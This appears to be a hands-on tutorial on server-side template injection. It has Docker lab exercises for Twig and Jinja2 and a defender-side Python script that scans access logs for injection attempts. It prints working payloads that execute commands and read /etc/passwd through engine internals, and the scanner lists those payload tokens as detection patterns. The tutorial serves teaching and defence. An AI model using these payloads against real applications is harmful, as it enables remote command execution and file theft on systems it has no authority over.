Master Server‑Side Template Injection: Hands‑On Labs with Twig & Jinja2

This tutorial explains server‑side template injection (SSTI), shows how to identify vulnerable template engines, and provides hands‑on Docker‑based labs for Twig (PHP) and Jinja2 (Python) with code examples, payloads, and step‑by‑step exploitation guidance.

Programmer DD

1. Introduction

Template injection, also known as Server‑Side Template Injection (SSTI), is a class of security vulnerabilities discovered in 2015. James Kettle’s Black Hat talk laid the foundation for exploiting many template engines. Exploiting these flaws requires knowledge of the target template library or language.

This article introduces SSTI, explores common attack patterns, and provides five vulnerable template engines, each with an exercise that exposes that engine's specific behaviour.

Required Software

Apart from Docker and Docker Compose to run the labs, the only requirement is an HTTP intercepting proxy such as Burp Suite or OWASP ZAP.

Running the Applications

Download the code, read the README for build instructions, and start the applications from the repository directory with Docker Compose.

$ git clone https://github.com/GoSecure/template-injection-workshop
$ cd template-injection-workshop
$ docker-compose up

Optional DNS Configuration

Add the following line to your hosts file to resolve the test domain:

127.0.0.1 template-injection.gosec.co

2. Template Injection

Template engines render static templates with dynamic values, producing HTML for the client. SaaS platforms often let users edit templates directly, which turns the template engine itself into the attack surface and makes such platforms attractive targets.

Data Binding Example

Hello {{firstName}} {{lastName}}!

Nested attribute example:

Hello {{user.firstName}} {{user.lastName}}!

Thinking Outside the Box

Attackers abuse legitimate engine features such as attribute access, function calls, and filter registration to read files, execute commands, or manipulate the application's internal state.

3. Identifying Template Engines

Many languages have dozens of template libraries. Focus on the most popular ones for a given language, e.g., Twig for PHP and Jinja2 for Python.

Heuristic Methods

Rather than blindly brute-forcing payloads, test incrementally: start with a harmless expression, raise your confidence about the engine from how it renders (or rejects) it, and adjust the payload to that engine's syntax.

4. LAB 1: Twig (PHP)

Twig is the most popular PHP template engine, used by Symfony and Craft CMS.

Basic Syntax

Hello {{ var }}
Hello {{ var|escape }}

Attack Surface

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}

Exercise: connect to http://template-injection.gosec.co:8012/ and submit a simple expression such as {{1338-1}}, which should render 1337 if the input is evaluated. Use the payload above to execute the id command and read flag.txt.

5. LAB 2: Jinja2 (Python)

Jinja2 is a popular Python template engine.

Basic Syntax

{{ message }}
{{ foo.bar }}
{{ foo['bar'] }}

Attack Surface

Starting from any object, access its class, walk the MRO to object, enumerate the loaded subclasses, and invoke one of them to read files or execute commands. The subclass indices in the payloads below depend on the Python version and the modules the application has loaded, which is why the same payload looks different from one environment to another.

{{''.__class__.__mro__[2].__subclasses__()[40]("/etc/passwd","r").read()}}

subprocess.Popen can be reached the same way via subclass enumeration:

{{[].__class__.__mro__[1].__subclasses__()[245]('ls /',shell=True,stdout=-1).communicate()[0].strip()}}

Exercise: connect to http://template-injection.gosec.co:8013/ and use arithmetic to discover the vulnerable parameter, then exploit the engine to read flag.txt.
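As an added, defender-side example (not part of the workshop or this article), the following Python script turns the identification heuristics of section 3 around: it scans constructed access-log lines for template delimiters, for {{1338-1}}-style arithmetic probes, and for the Twig and Jinja2 identifiers used in the payloads of Labs 1 and 2, and separates a mere probe from an attempt to reach engine internals. The log format, parameter names and sample lines are assumptions.

```python
"""Flag SSTI probes and exploit attempts in access-log query strings (constructed example)."""
import re
from urllib.parse import parse_qsl, urlsplit

# Identifiers from the Twig and Jinja2 payloads shown in Labs 1 and 2. Any of
# them in user input marks an exploit attempt rather than a harmless probe.
DANGEROUS_TOKENS = ("_self.env", "registerUndefinedFilterCallback", "getFilter(",
                    "__class__", "__mro__", "__subclasses__", "communicate(")
EXPR_DELIMS = re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S)   # {{ }} / {% %} delimiters
ARITH_PROBE = re.compile(r"\{\{\s*\d+\s*[-+*/]\s*\d+\s*\}\}")  # e.g. {{1338-1}}
REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)')           # request line in a log entry

def classify(value):
    """Return (severity, reasons) for one percent-decoded parameter value."""
    reasons = []
    if EXPR_DELIMS.search(value):
        reasons.append("template-delimiters")
    if ARITH_PROBE.search(value):
        reasons.append("arithmetic-probe")
    reasons += ["dangerous:" + tok for tok in DANGEROUS_TOKENS if tok in value]
    if not reasons:
        return None, []
    hit_internals = any(r.startswith("dangerous:") for r in reasons)
    return ("exploit-attempt" if hit_internals else "probe"), reasons

def scan_log(lines):
    """Decode every query parameter of each request line and collect findings."""
    findings = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        # parse_qsl percent-decodes, so %7B%7B becomes {{ before matching.
        for name, value in parse_qsl(urlsplit(m.group(1)).query, keep_blank_values=True):
            sev, reasons = classify(value)
            if sev:
                findings.append({"param": name, "value": value,
                                 "severity": sev, "reasons": reasons})
    return findings

# Constructed sample log: a benign request, an arithmetic probe, then the Twig
# and Jinja2 payloads from this page, percent-encoded as a browser would send them.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /?name=Alice HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /?name=%7B%7B1338-1%7D%7D HTTP/1.1" 200 514',
    '10.0.0.5 - - [01/Jan/2024:10:00:09 +0000] "GET /?name=%7B%7B_self.env.registerUndefinedFilterCallback(%22exec%22)%7D%7D HTTP/1.1" 200 700',
    '10.0.0.5 - - [01/Jan/2024:10:00:12 +0000] "GET /?q=%7B%7B%27%27.__class__.__mro__%5B2%5D.__subclasses__()%7D%7D HTTP/1.1" 200 900',
]
```

Running scan_log(SAMPLE_LOG) yields one "probe" finding for the arithmetic test and two "exploit-attempt" findings for the Twig and Jinja2 payloads; the benign request produces nothing.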

Conclusion

The article covered SSTI concepts, engine identification, and hands‑on labs for Twig and Jinja2, with more labs to follow.
